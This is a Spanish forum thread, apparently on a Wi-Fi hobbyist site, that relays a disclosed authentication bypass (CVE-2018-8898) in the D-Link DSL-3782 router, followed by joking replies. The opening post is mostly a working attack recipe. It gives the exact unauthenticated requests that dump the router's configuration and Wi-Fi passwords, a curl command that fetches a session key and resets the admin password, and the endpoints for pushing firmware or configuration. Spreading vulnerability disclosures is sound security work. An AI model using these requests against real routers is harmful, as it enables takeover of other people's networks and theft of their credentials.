Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

kcdtv · 21-05-2018 13:00:52

Cómo entrar en la interfaz de configuración de un D-Link DSL-3872 sin credenciales

fuente

D-Link DSL 3782 - Authentication Bypass by Giulio Comi @ packetsorms

El D-Link DSL-3872 es un modelo de doble banda con soporte ac.
No es un modelo de alta gama o de última generación pero tampoco está completamente desfasado.
Wireless AC1200 Dual Band VDSL ADSL Modem Router DSL‑3782
Vamos a ver juntos lo fácil que es saltarse los credenciales para tomar el control del dispositivo

Para obtener todas las contraseñas basta con entrar está petición en la barra del navegador

GET  http://192.168.1.1/romfile.cfg

Si lo que buscamos son solo las contraseñas wifi, podemos obtenerlas así:

Red b/g/n;

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp

Red ac:

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp

Red invitados

GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp

Si queremos modificar la configuración directamente, una llave de sesión es necesaria.
Se obtiene así:

GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp

Una vez que tenemos a esta llave podemos emplearla para cambiar la configuración del dispositivo con peticiones POST.
Ejemplos:

Cambiar los credenciales de administrador de acceso a la interfaz web

curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp

Cambiar las contraseñas wifi

POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp

Actualizar firmware

POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp

Forzar reboot

POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp

Subir una nueva configuración

POST /cgi-bin/New_GUI/Set/config_upgrade.asp

El problema, otra vez, es que D-Link no ha hecho nada tras haber sido advertido. pam
Otro problema es que la explotar la brecha es de lo más sencillo debido a la pésima programación del firmware.
El router es básicamente incapaz de distinguir las peticiones de un usuario debidamente identificado de las peticiones de un usuario ilegitimo.
Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link! roll

crash · 21-05-2018 13:13:08

vaya tela, ya solo le falta abrir la puerta de la cocina y traerte unas biere

kcdtv · 21-05-2018 13:18:42

Una lastima que los routers no tengan brazos y patas aún, sino sería posible con una "smart nevera" de estas conectada al PA. big_smile

josep345 · 21-05-2018 13:20:56

sheriff escribió:

Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link!

Jajajajaja nunca mejor explicado Xd,a quien le gusta estar con el culo al aire,,,,buena información a tener muy en cuenta para los propietarios de dichos routers.

Tema	Respuestas	Vistas	Ultimo mensaje
No escanea redes mi Awus036ach por Victoracillo	1	102	18-09-2020 12:16:10 por kcdtv
Pegado: Pegado:: Bully WPS: La alternativa a Reaver renace con soporte Pixiewps por kcdtv [ 1 2 3 ]	66	47750	12-09-2020 12:02:47 por kcdtv
Less: Scroll en consola (porque a veces menos es más) por kcdtv	0	143	08-09-2020 16:15:01 por kcdtv
Unboxing Raspberry Pi 4 ¡Despertando al niñ@ que llevas a dentro! por kcdtv	0	130	05-09-2020 13:36:44 por kcdtv
Pegado: Pegado:: Wireless Air Cut, auditoria del protocolo wps en Windows por Patcher [ 1 2 3 … 20 ]	479	236281	31-08-2020 12:09:10 por Patcher

Foro Wifi-libre.com

Anuncio

#1 21-05-2018 13:00:52